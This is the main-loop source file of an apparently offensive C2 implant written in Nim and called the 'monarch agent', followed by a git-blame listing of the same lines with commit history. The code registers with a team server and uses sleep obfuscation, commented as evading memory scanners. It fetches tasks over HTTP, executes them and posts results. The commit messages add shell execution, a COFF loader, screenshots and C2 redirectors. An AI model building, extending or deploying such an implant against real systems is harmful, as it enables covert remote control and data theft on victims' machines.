src/agent/main.nim

import strformat, os, times, system, base64, random

import core/[http, context, sleepmask]
import utils/io
import protocol/[task, result, heartbeat, registration]
import ../common/[types, utils, crypto]

proc main() = 
    randomize()

    # Initialize agent context
    var ctx = AgentCtx.init()
    if ctx == nil: 
        quit(0)

    # Create registration payload
    var registration: AgentRegistrationData = ctx.collectAgentMetadata()
    let registrationBytes = ctx.serializeRegistrationData(registration)

    if ctx.httpPost(registrationBytes): 
        print fmt"[+] [{ctx.agentId}] Agent registered."
        ctx.registered = true
    else: 
        print "[-] Agent registration failed."

    #[
        Agent routine: 
        1. Register to the team server if not already register
        2. Sleep Obfuscation
        3. Retrieve tasks via checkin request to a GET endpoint
        4. Execute task and post result
        5. If additional tasks have been fetched, go to 3.
        6. If no more tasks need to be executed, go to 1. 
    ]#
    while true: 

        # Sleep obfuscation to evade memory scanners
        sleepObfuscate(ctx.sleepSettings)
        
        # Register
        if not ctx.registered: 
            if ctx.httpPost(registrationBytes): 
                print fmt"[+] [{ctx.agentId}] Agent registered."
                ctx.registered = true
            else: 
                print "[-] Agent registration failed."
                continue

        let date: string = now().format(protect("dd-MM-yyyy HH:mm:ss"))
        print "\n", fmt"[*] [{date}] Checking in."

        try: 
            # Retrieve task queue for the current agent by sending a check-in/heartbeat request
            # The check-in request contains the agentId and listenerId, so the server knows which tasks to return
            var heartbeat: Heartbeat = ctx.createHeartbeat()
            let 
                heartbeatBytes: seq[byte] = ctx.serializeHeartbeat(heartbeat)
                packet: string = ctx.httpGet(heartbeatBytes)

            if packet.len <= 0: 
                print "[*] No tasks to execute."
                continue

            let tasks: seq[Task] = ctx.deserializePacket(packet)
            
            if tasks.len <= 0: 
                print "[*] No tasks to execute."
                continue

            # Execute all retrieved tasks and return their output to the server
            for task in tasks: 
                var result: TaskResult = ctx.handleTask(task)
                let resultBytes: seq[byte] = ctx.serializeTaskResult(result)

                ctx.httpPost(resultBytes)

        except CatchableError as err: 
            print "[-] ", err.msg

when isMainModule:
    main()
Implemented callback host system to support HTTP redirectors 2025-10-11 17:10:18 +02:00			`import strformat, os, times, system, base64, random`
Added monarch agent 2025-05-19 21:56:34 +02:00
Updated directory structure and added simple 'exit' command to terminate an agent. 2025-10-23 17:28:07 +02:00			`import core/[http, context, sleepmask]`
			`import utils/io`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`import protocol/[task, result, heartbeat, registration]`
Rework module system. Now modules/commands are defined in a single file each, with both the function executed by teh agent and the definition for server-side argument parsing. 2025-07-25 16:41:29 +02:00			`import ../common/[types, utils, crypto]`
Added monarch agent 2025-05-19 21:56:34 +02:00
			`proc main() =`
Implemented callback host system to support HTTP redirectors 2025-10-11 17:10:18 +02:00			`randomize()`
Added monarch agent 2025-05-19 21:56:34 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`# Initialize agent context`
			`var ctx = AgentCtx.init()`
			`if ctx == nil:`
Agent utilizes configuration file (nim.cfg) and compile-time variables for listener information. 2025-05-24 13:56:26 +02:00			`quit(0)`

Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`# Create registration payload`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`var registration: AgentRegistrationData = ctx.collectAgentMetadata()`
			`let registrationBytes = ctx.serializeRegistrationData(registration)`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00
Agent now re-registers to the team-server when it is still alive after it was removed via the client. 2025-10-27 16:20:38 +01:00			`if ctx.httpPost(registrationBytes):`
			`print fmt"[+] [{ctx.agentId}] Agent registered."`
			`ctx.registered = true`
			`else:`
			`print "[-] Agent registration failed."`
Added monarch agent 2025-05-19 21:56:34 +02:00
			`#[`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`Agent routine:`
Agent now re-registers to the team-server when it is still alive after it was removed via the client. 2025-10-27 16:20:38 +01:00			`1. Register to the team server if not already register`
			`2. Sleep Obfuscation`
			`3. Retrieve tasks via checkin request to a GET endpoint`
			`4. Execute task and post result`
			`5. If additional tasks have been fetched, go to 3.`
			`6. If no more tasks need to be executed, go to 1.`
Added monarch agent 2025-05-19 21:56:34 +02:00			`]#`
			`while true:`
Agent now re-registers to the team-server when it is still alive after it was removed via the client. 2025-10-27 16:20:38 +01:00
Integrated sleep obfuscation settings into agent generation. 2025-09-04 13:44:50 +02:00			`# Sleep obfuscation to evade memory scanners`
Implemented jitter. 2025-10-23 11:14:26 +02:00			`sleepObfuscate(ctx.sleepSettings)`
Agent now re-registers to the team-server when it is still alive after it was removed via the client. 2025-10-27 16:20:38 +01:00
			`# Register`
			`if not ctx.registered:`
			`if ctx.httpPost(registrationBytes):`
			`print fmt"[+] [{ctx.agentId}] Agent registered."`
			`ctx.registered = true`
			`else:`
			`print "[-] Agent registration failed."`
			`continue`
Added monarch agent 2025-05-19 21:56:34 +02:00
Updated directory structure and added simple 'exit' command to terminate an agent. 2025-10-23 17:28:07 +02:00			`let date: string = now().format(protect("dd-MM-yyyy HH:mm:ss"))`
Implemented setting for verbose mode that prints debug messages in the windows where the agent is executed. Setting "verbose" to false disables all console output of the agent program. 2025-10-20 22:08:06 +02:00			`print "\n", fmt"[*] [{date}] Checking in."`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`try:`
			`# Retrieve task queue for the current agent by sending a check-in/heartbeat request`
Updated directory structure and added simple 'exit' command to terminate an agent. 2025-10-23 17:28:07 +02:00			`# The check-in request contains the agentId and listenerId, so the server knows which tasks to return`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`var heartbeat: Heartbeat = ctx.createHeartbeat()`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`let`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`heartbeatBytes: seq[byte] = ctx.serializeHeartbeat(heartbeat)`
			`packet: string = ctx.httpGet(heartbeatBytes)`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`if packet.len <= 0:`
Agent now re-registers to the team-server when it is still alive after it was removed via the client. 2025-10-27 16:20:38 +01:00			`print "[*] No tasks to execute."`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`continue`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`let tasks: seq[Task] = ctx.deserializePacket(packet)`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00
			`if tasks.len <= 0:`
Agent now re-registers to the team-server when it is still alive after it was removed via the client. 2025-10-27 16:20:38 +01:00			`print "[*] No tasks to execute."`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`continue`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`# Execute all retrieved tasks and return their output to the server`
			`for task in tasks:`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`var result: TaskResult = ctx.handleTask(task)`
			`let resultBytes: seq[byte] = ctx.serializeTaskResult(result)`
Implemented communication with custom binary structure instead of JSON requests 2025-07-19 16:49:27 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`ctx.httpPost(resultBytes)`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00
			`except CatchableError as err:`
Agent now re-registers to the team-server when it is still alive after it was removed via the client. 2025-10-27 16:20:38 +01:00			`print "[-] ", err.msg`
Implemented 'screenshot' command. 2025-09-03 19:38:22 +02:00
Implemented COFF loader. 2025-08-28 19:00:34 +02:00			`when isMainModule:`
Added monarch agent 2025-05-19 21:56:34 +02:00			`main()`